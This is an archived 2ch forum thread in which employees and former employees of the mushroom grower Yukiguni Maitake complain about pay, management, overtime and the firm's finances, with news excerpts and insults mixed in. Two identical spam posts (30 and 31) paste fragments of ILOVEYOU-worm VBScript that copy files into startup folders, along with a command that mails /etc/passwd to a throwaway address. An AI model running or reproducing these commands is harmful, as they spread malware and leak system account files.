2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【きのこ】雪国まいたけ その2

1 :基本能力0:2006/03/32(土) 00:16:04
新レス立てたよ!!!!
サー頑張ってまた白紙を貼りましょう。

2 : :2006/03/32(土) 00:18:16



















3 : ω  :2006/03/32(土) 00:19:19
       





















4 :総合力:2006/03/32(土) 00:20:29
>>2
早いよ!きみ

5 :名無しさん@お腹いっぱい。:2006/03/32(土) 00:22:38
マターリと
ヤテクレ♪

6 :名無しさん@お腹いっぱい。:2006/03/32(土) 00:28:16
■■■■■■■■■■■■■■■■■■■■■■■■

筑紫23の偏向報道に対しスポンサー不買運動始まる
http://human5.2ch.net/test/read.cgi/ms/1142925722/

■■■■■■■■■■■■■■■■■■■■■■■■

真の愛国者諸君よ、2chの力を見せつけてあげましょう



7 :名無しさん@お腹いっぱい。:2006/03/32(土) 05:48:59
http://society3.2ch.net/test/read.cgi/agri/1143790561/l50

こちらが先

8 :名無しさん@お腹いっぱい。:2006/03/32(土) 20:53:32
>>1
削除依頼すてね

9 :名無しさん@お腹いっぱい。:2006/03/32(土) 21:40:22
こっちの方が書き込みが多いんだけど・・・・
てか日付けがスゲー事になってねえ?

10 :名無しさん@お腹いっぱい。:2006/04/02(日) 00:04:49
10ゲッター
ぷッ
自己完結。乙

11 :名無しさん@お腹いっぱい。:2006/04/02(日) 15:41:51
会社のパソコンに勝手にソフトを入れるなって言う電算!
監視ツールを入れさせてるならそれ使えよ!!
無能じゃないなら抑制効果狙って自分たちの作業ログでも
公開して見なさいよ!?

12 :名無しさん@お腹いっぱい。:2006/04/04(火) 07:36:47


















13 :名無しさん@お腹いっぱい。:2006/04/05(水) 00:43:57
なんで会社から見れねぇの??
雪国まいたけから2ちゃん見れなくしてメリットあんのか?
頭おかしいんじゃねえの…
んな暇あったら、そんな下らねぇ事に時間費やしてるボケどもやめさせろや。
役員も首にして給料上げてくれ…頼みますよ本当に。。


14 :名無しさん@お腹いっぱい。:2006/04/05(水) 23:48:44
そろそろ単価が限界きてるんじゃないですか????????
イッチーの基地外が暴れまわってるからな。

15 :名無しさん@お腹いっぱい。:2006/04/08(土) 23:43:51
雪国まいたけ倒産疑惑。

16 :名無しさん@お腹いっぱい。:2006/04/09(日) 13:45:39
よういちは今日も出勤してまつ。

17 :名無しさん@お腹いっぱい。:2006/04/09(日) 16:10:40
ツグアキ死す。

18 :名無しさん@お腹いっぱい。:2006/04/09(日) 16:33:20
総務・業務・営業本部、いらなくないですか?
営業の足ひっぱりひっぱり自己満足。
会社利益優先力不足、危機意識欠如のまったり総務。
自らの仕事を営業丸投げ、修正願いワーストチェックのくだらねぇメールの添付。
はっきり言って営業の敵。業務腐りすぎだから死ねよ(上がだよ。修正願いの一覧を送ってくる馬鹿達のこと)。
本部もクソだろう?
何にも営業支援になってねえし。
トラブル有ればばっくれんだろ?営業責任とか言って。
本社とか言うのやめろよ。
ど田舎の会社が本社って…。
マーケットで言えば、新潟なんてどこの営業所よりも田舎なんだからさ。
田舎発信の意見なんて気にしねえって。
あ〜また新潟の馬鹿がなんか言ってるな〜、新潟に本部があるからやっぱり馬鹿ないけんしか出ねーもんだよな。

何でみんな辞めるか考えてみろよ。
総務H部長、部長であってる??
死に体だよもう。新卒もかわいそうだよ。
加工も生も、もうみんな限界だよ。

俺はもう雪国辞めたけど、商品は大好きだった。
誇りを持って営業していたし、好く売れた。

でも、会社が大嫌いだった。
給料上がらないし、上がるべき役職には常に中途幹部がいるから。
馬鹿だなって。
経営者が馬鹿だなって思った。

もう2度と働かないけど、今でも商品に関しては日本一だと思ってる。
上層部が変わらなければ、みんな消えてしまうよ。

検討祈ります。


19 :名無しさん@お腹いっぱい。:2006/04/10(月) 06:39:23
>>18
検討祈ります。じゃなくて
健闘祈ります。ダロ!!
結局君も1年位で結果が残せずにクビになったクチだろ。
まあ、東京は六日町に比べ高給取りが多いからな! 特に加工は!
平均年収320万円の新潟から見れば高給取りの尻拭いなんか
バッカバッカしくてやってられないよ。


20 :名無しさん@お腹いっぱい。:2006/04/10(月) 10:48:47
いや なら やめろ

かわり いくらでも いる

21 :名無しさん@お腹いっぱい。:2006/04/10(月) 23:00:00
>>20
あ、君はト-タクの中国人ですか?
よう淘汰君。
7階のトータクの会社表示。「ク」が取れてトータになってます。

>>19
高給取りっても一部の一部(加工の部のことじゃない)。
俺だって正に320万ですよ。
いい年こいて結婚も出来ねえよ。。。。

22 :名無しさん@お腹いっぱい。:2006/04/11(火) 13:21:40
320万 結構じゃないか

会社の苦しい現状を考えろ

財務状況を見れば贅沢はいえん

給料が上がるよう会社に貢献しろ

23 :名無しさん@お腹いっぱい。:2006/04/11(火) 22:16:10
















24 :名無しさん@お腹いっぱい。:2006/04/12(水) 11:28:47
>>22
一正も負けじとかなり年収低いぞ。
向こうもこっちも会社の現状見りゃ贅沢言えないけどさ〜。

25 :名無しさん@お腹いっぱい。:2006/04/13(木) 22:16:48
それが営業

26 :名無しさん@お腹いっぱい。:2006/04/15(土) 00:44:24
じねんこ


27 :名無しさん@お腹いっぱい。:2006/04/15(土) 20:47:15
ttp://www.nikkei.co.jp/news/retto/20060414c3b1404614.html
雪国まいたけ、中国でエノキダケ生産本格化

雪国まいたけは中国のきのこ生産工場を増設し、エノキダケの生産・販売を本格展開する。
今年1月から試験販売していたが、品質的に問題ないと判断した。
中国でのエノキダケの売上高は2006年度は4億1200万円と見込んでいるが、08年度には6億7400万円と6割以上増やす。

現地で生産・販売するのは子会社である上海雪国高榕生物技術公司(上海市)。
雪国まいたけが55%、上海高榕食品公司が45%出資し、05年2月に設立した。

工場の増設は3億円をかけて実施し、7月に完成する予定。
敷地面積3万9960平方メートルで、鉄骨平屋建て、延べ床面積は万6266平方メートルになる。
日産能力は現在の五トンから12トンになる。


28 :名無しさん@お腹いっぱい。:2006/04/17(月) 08:59:14
雪国まいたけが下方修正

雪国まいたけは十四日、二〇〇六年三月期の連結業績予想を下方修正した。
売上高は二月予想比四・三%減の二百三十七億二千二百万円、経常利益は
同五七・〇%減の三億四千四百万円、純利益は同四四・一%減の二億二千三百万円。
 二月中旬からの急激な寒気の緩みに伴い春野菜の出荷が急増したため、
きのこ市況が影響を受けて生きのこの出荷が落ち込んだ。同業他社の安値販売が
広がり販売量などが見込みを下回った。

29 :名無しさん@お腹いっぱい。:2006/04/17(月) 21:57:40














30 :eip = eip + unescape(:2006/04/17(月) 22:14:35
ttp://www.trasher.ru/foto/trasher/trasher.jpg
ttp://virus.org.ua/unix/woid.jpg
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ttp://thumbstower.com/?pics/animals/pages/2161.jpg

31 :名無しさん@お腹いっぱい。:2006/04/19(水) 21:45:18
ttp://www.trasher.ru/foto/trasher/trasher.jpg
ttp://virus.org.ua/unix/woid.jpg
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ttp://thumbstower.com/?pics/animals/pages/2161.jpg

32 :名無しさん@お腹いっぱい。:2006/04/20(木) 00:15:33
氏ね

33 :名無しさん@お腹いっぱい。:2006/04/20(木) 15:20:53
雪国まいたけ タカラバイオと業務提携でホクトに対抗

34 :名無しさん@お腹いっぱい。:2006/04/21(金) 09:45:28
















35 :名無しさん@お腹いっぱい。:2006/05/15(月) 01:31:29
借金が年商超えてる・・・
自転車操業やね

36 :名無しさん@お腹いっぱい。:2006/05/31(水) 21:20:06
この会社に入れば・・・・・・

37 :名無しさん@お腹いっぱい。:2006/05/31(水) 21:22:56
打つかサル

38 :名無しさん@お腹いっぱい。:2006/09/25(月) 21:27:38
この工場オワタ\( ^o^)/

39 :名無しさん@お腹いっぱい。:2006/09/27(水) 22:42:51
雪国もやしめちゃくちゃ高いって、西友に安いのだしてんじゃん

40 :名無しさん@お腹いっぱい。:2006/11/18(土) 23:36:29
打つになったって誰
教えて

41 :名無しさん@お腹いっぱい。:2006/11/29(水) 08:59:43
東京の人でしょ?
他にも結構うつの方います。

会社の体質が社員の健康を蝕んでいます。


42 :名無しさん@お腹いっぱい。:2006/11/30(木) 08:51:23
加工品のしと?

43 :名無しさん@お腹いっぱい。:2006/11/30(木) 22:18:41
加工の

44 :名無しさん@お腹いっぱい。:2006/12/01(金) 21:12:18
本社系は?
えらそうな人は?

45 :もやしっこ:2006/12/01(金) 22:53:01
今度、この会社に入ろうと思っているけど
やめたほうがいいのか?

46 :あぼーん:あぼーん
あぼーん

47 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:18:05
やめとけ

48 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:30:54
突然話が変わってすみません
昔 三、四年位前
合コンであったくみちゃんってまだ御社に居ますか
たしかクリスマスが誕生日だったと記憶しています
誕生日が近いのでまだもし居たら連絡取ろうかなと思い出しました
もうやめてるかも
辞めてたがってたし

49 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:34:44
あーあ クリスマス…
あきらめますた
失礼しました

50 :名無しさん@お腹いっぱい:2007/01/05(金) 18:03:46
年が明けましたけど、資金繰りは如何ですか??

51 :名無しさん@お腹いっぱい。:2007/02/01(木) 21:43:03
部署異動してから残業手当という存在が消えた。
何十倍も残業してんのに。有休も捨てる。時間捨てるとかもううんこ

なんちゅうか自己利益優先力な人ばっかりだぜ。ヒラだけではなく職制役員とかも含めてな。
会社内で金動かしても会社の得にはなんねーんだよ
最終的にお客さんに買ってもらわんとてめーの給料の元が増えないくらい考えろっての
工場現場はもう殆ど会社人じゃないな。言われた事やってりゃいいだけ、責任感もクソもねぇ。
現場あがりだから自分も分かる。
それに加えて自己利益優先入るからタチ悪い。某主任なんてゴマすり過ぎて、仕事目的がズレている。
当然、その部下もズレる。


前工程は次工程に都合良いモノ流そうって考えくらいもて
自分の工程結果さえ良ければ自分の評価は上がるかもしれんが、次工程に支障がでるような作業してたら
最終的、商品を売る際にはどんどん商品、作業品質は落ちんだよ

前工程は後工程が仕事しやすいよう、思いやって作業しる
後工程は前工程の労力を無駄にしない為に、繋げろ
責任のなすりつけばっかしてんな、足引っ張り合うのもいい加減にしろ



皆で力合わせろよ… ('A`)





52 :名無しさん@お腹いっぱい。:2007/02/03(土) 21:18:17
たしかに
部所によって残業手当支給家賃手当て基準に差がありすぎる
やってらんねぇ
人事制度やエクセル試験
なにも評価変わらず
取り組み損

53 :名無しさん@お腹いっぱい。:2007/02/04(日) 00:07:01
>>51-52
よう、俺。

現場はマジ天国、言われた事やって残業ついて。
視野狭くなるし、人間的成長はあまりできないけど今よりマシな点が多すぎるぜ。
あーあもどりてー肉体労働やりてー
なんで俺こんな日常おくってんだろバカバカしい。

13 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)